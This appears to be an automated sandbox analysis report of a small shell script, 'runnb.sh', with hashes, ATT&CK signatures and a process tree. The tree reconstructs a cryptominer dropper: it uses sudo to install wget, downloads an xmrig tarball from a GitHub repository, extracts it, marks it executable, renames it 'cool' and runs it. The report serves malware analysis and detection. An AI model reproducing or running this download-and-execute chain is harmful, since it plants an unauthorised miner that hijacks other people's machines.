Analysis
-
max time kernel
47s -
max time network
50s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30/10/2024, 13:11
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 763 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 704 sudo -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
description ioc Process File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/self/fd sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems mv File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/ngroups_max sudo -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fileutl.message.rI7jbi apt File opened for modification /tmp/fileutl.message.dXYb6i apt File opened for modification /tmp/fileutl.message.jERPhv apt File opened for modification /tmp/fileutl.message.x7IX4P apt File opened for modification /tmp/fileutl.message.Xq4tlU apt File opened for modification /tmp/fileutl.message.FgDUuY apt File opened for modification /tmp/fileutl.message.VTey0i apt File opened for modification /tmp/fileutl.message.vXs1CJ apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:701
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:704 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:716 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67YZ-0000BY-Ui4⤵
- Reads CPU attributes
PID:730
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:719 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67YZ-0000Bb-Ut4⤵
- Reads CPU attributes
PID:731
-
-
-
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:729
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:736
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:756
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:757
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:761
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:762
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:763
-
-
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:764
-
-
/tmp/cool./cool2⤵PID:765
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
843B
MD54ee1bd851c297a572d5247942edd7bce
SHA13a970707866bada69f605e9d8083daa684236d42
SHA256c2fc3103a4bf21fdcf9d9b17aa00f58245a496cdced4814995f1261b86a9a715
SHA5126cddb2a12f44adb7d72b6afb90d83ad89bacb601b8fc5e0028f02bd8c5eeeaf76aa632fdc3441b039eb2f0449da7f671414beb0fe9de087b04afa3162adf164b
-
Filesize
1KB
MD5c60d17e6c514da2464bffaa872f0f88d
SHA1c820cf374a76b4c33037e8f38c11e83d06b09555
SHA256e73aed83399a6de96d4b10cf1675049f9f68e51a2a5982d2a1f0f997d9f4c457
SHA512505c66f10898e05cfecc87b69ee457403da41a52abc90225a982f28e2e1257226660ba21509528501bb8e669f9332bdede2ecc202fd2a893d1228423ae988952
-
Filesize
128B
MD5c94a3c403586f5f0867c7f8b10e5a14f
SHA19c9b872355c1113a077e17fec0af867314f06dfa
SHA2561b0b4b4ae2c32a2807649037e0a9a4637bf3eb0c6cf2a6160759bff6b89e82b8
SHA51224b27b9866e1ceaca4a17b07e01a56d3739b9f3cc6db9cedadf14112b974bc76f8fb65948a408f7974bdeb7f80a2ad278a242af8cd95f5d446154f03281dbb5f
-
Filesize
146B
MD556f39a50cbed2a535de2bf72bcabcbfb
SHA1dc13ec1acba48996ae76f4a7f97cf3a1c16bd74a
SHA256a4850cbfc76f0a618e17c8cb2b361d9fb34dd891daca112e16bc53bd3b85f448
SHA512ea9b82b4191d5c582feb82b950816120fd452acc26bf74ffc1b3db61504a86b178d416262e8a998f57be2a623b3e8c36660a291e39b2e58ae300f1b6b9de90b6
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
915B
MD5e2575c47c21aa2a9c5ca6e57210aef5b
SHA1c7067db18d107329a8fcf6f732ee2ec4d4eb8d16
SHA256b8280645a199d15261d59dddb1616a9d46be469632c3c4bd2f22d2c123b5d2cc
SHA51290d2e154aecb6da327275ffa8691be28a9d786c7724ea8267fc6d86c08008c3ec79cb167599a50737971269e50907c31f121d9c1e947c481c4816866f7d4e5f6
-
Filesize
288B
MD5b2ea4405315e030a0094a0f3e27cf70f
SHA1e172162932b66787958dc80aa356195a3d2bf65a
SHA25676b233f534af74972cea388443d21de32190e86eff2f178deb5d2bd46633308a
SHA5123ef48d693ec775343c0ff671fb7c9840d33700eca0a8bf66a60f0240b291f9ace74a3c407f481d3876f22b28b25e97649d342c9eaea054d62adaaaea23c663ee
-
Filesize
89B
MD55ff3a8e5d50fc9ea5415d99f17554dbf
SHA156dc2fa3bacf8fb391b7746476ee824b7f51e94b
SHA256bd510c6848c1028976d2912f90a0cd6c5793d1cb7ef7b9de4f8b306ba5277abd
SHA512390a0b92793d4e7de3c1e713a16b7fcca6ab51544e554fbab39e110b689acd379ddc14de2c973d7bb3f5ff03041ea391e2043bc93c5ca15ea8237dbd0e9e73c0
-
Filesize
288B
MD5e52e0fe1b583cd62c0b45655d3f4e50d
SHA11070ed31f6692be4b26b5ca02a8505045e6b0bc9
SHA25689784b13a2e728a1345d930da50d76f89bb9e587c531404a50dfb6ee834c8e4c
SHA5120c4004eac116bddf887e1f0f405f2123c50b86e6beafc86f2668f08f9474d7c4ffee0231ed6c8c13e22877542570249d9d91e1c337aa4a8a69c95dd9e2b15299
-
Filesize
89B
MD51ea3481b3d36973061a897fc035e46f6
SHA14a1f30f1a14bdfad060963c9a43e53ce0fe3d1ad
SHA256c668c3dcd1c8b8199e6b9e876ac43991ab9b0770a84c2784bddad03151f7fd72
SHA512d9ff93d81d8c9ac9ed978c2de5bb57d3f4caf964dfaa3fa50a7f37fa3e0e6d1b09a4756630b7a7d2530c76d31eff114d040a6956157b66daf3fcb03dce4ec076